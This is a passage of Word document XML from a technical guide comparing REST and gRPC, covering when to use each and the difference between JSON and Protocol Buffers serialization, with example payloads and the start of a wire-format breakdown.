        <w:t xml:space="preserve">  REST/HTTP1.1: ~1000–5000 RPS (limited by serial request-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23498781" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC/HTTP2:   ~10000–50000 RPS (multiplexed, pipelined)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E01463" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 When to Use REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B0077" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CDC1A7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Public-facing APIs (external developers, third-party integrations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8AF736" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Universal: any language, any client, any tool (curl, browser, Postman).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503AC0C3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Self-documenting: URLs are meaningful, JSON is readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7901D320" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → No client library needed: raw HTTP works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D6E1B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5C45E8D5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Browser-facing APIs (web applications, SPAs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01022A38" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Native browser support (fetch, XMLHttpRequest).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A5CF7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → No proxy/translation layer needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D5988" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Caching works out of the box (CDN, browser cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771087A0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5030016E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Simple CRUD applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3BFFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Natural resource model (users, orders, products).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D91D61" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Standard HTTP semantics map well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02491597" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → OpenAPI/Swagger for documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CE055E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="22B0B3E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Webhook / event notification APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF18937" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Simple POST with JSON body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2029F1F4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Any HTTP server can receive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0433D192" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Easy to test and debug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB7CCB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="14EF5EC7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>✓ APIs where caching is critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E13A267" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → HTTP caching is built-in (GET + Cache-Control + CDN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124A2668" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → gRPC has no equivalent out of the box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B02738" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 When to Use gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD551B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F16A468" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Internal microservice communication (service-to-service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ADFB14" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Performance matters (binary encoding, HTTP/2 multiplexing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57860B2D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Both sides controlled by same org (can mandate gRPC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C67A02D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Strong typing catches integration bugs at compile time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78CE97" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3B9A5471" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Low-latency, high-throughput scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA647DF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Trading systems, real-time data pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4820012A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Every microsecond matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED98938" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 5-10x better than REST for intensive inter-service calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A71DE78" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0D70731F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Streaming use cases (real-time data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFD115A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Live updates, chat, IoT data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F8029" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Bidirectional streaming native to gRPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C349642" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → REST requires WebSocket (separate protocol, more complexity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08755B5D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="193EBC27" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Polyglot environments (many programming languages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C4F4F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Generate client/server code for all languages from one .proto file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF5940D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Guaranteed interoperability (same binary format everywhere).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D69AD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → No manual JSON parsing/serialization bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BD91C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="4894B0AF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Strong contract enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4AF52E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → .proto file IS the API contract.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ACA3C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Breaking changes detected at compile time (not runtime).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12E5E0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Schema evolution rules prevent accidental incompatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F099624" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2DD1E621" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>✓ Mobile clients (bandwidth-constrained)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68764DFD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Protobuf is 60%+ smaller than JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9AC020" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Less data transfer = faster on slow networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C93D9A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → HTTP/2 header compression reduces overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D1CB4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="4AC21701">
          <v:rect id="_x0000_i6534" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74530479" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Serialization Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF830E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 JSON (REST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB3758C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB13DF1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A24EB2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "user_id": "usr-42",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1DE27" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "name": "Alice Johnson",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA44FB1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "email": "alice@example.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069204C2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "age": 30,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD3695" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "is_premium": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB3BD22" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "orders": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B9460" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"id": "ord-1", "total": 99.99},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127E43E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"id": "ord-2", "total": 149.50}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126BEF4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8091B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02122A21" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6D4E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B81B1FA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Size: ~250 bytes for above example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6995A66C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Parse speed: Moderate (text scanning, string allocation, hash map building)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1E7EF0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Type safety: None (everything is string/number/boolean/null/array/object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F880C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Null handling: Explicit ("field": null) or absent (omitted field)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2970FFA0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Number precision: IEEE 754 double (53-bit integers max — large IDs can lose precision!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B72D7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Schema: Optional (JSON Schema, but not enforced at transport level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25419A84" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Protocol Buffers (gRPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D18FE5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628A2B24" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A5F3F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string user_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C6C06" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string name = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C18E53E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string email = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321F44CE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  int32 age = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F5F09" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  bool is_premium = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210DD20F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  repeated Order orders = 6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A40519B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00877E14" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="68FC85C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message Order {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA50C32" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D1A47E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  double total = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA056CE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2EFF4B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wire format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504ADA5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F868522" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Binary encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE3C4B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 1 (string): 0x0A 0x06 "usr-42"       [tag=0x0A, len=6, data]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C0C60" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 2 (string): 0x12 0x0D "Alice Johnson" [tag=0x12, len=13, data]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21836D8F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
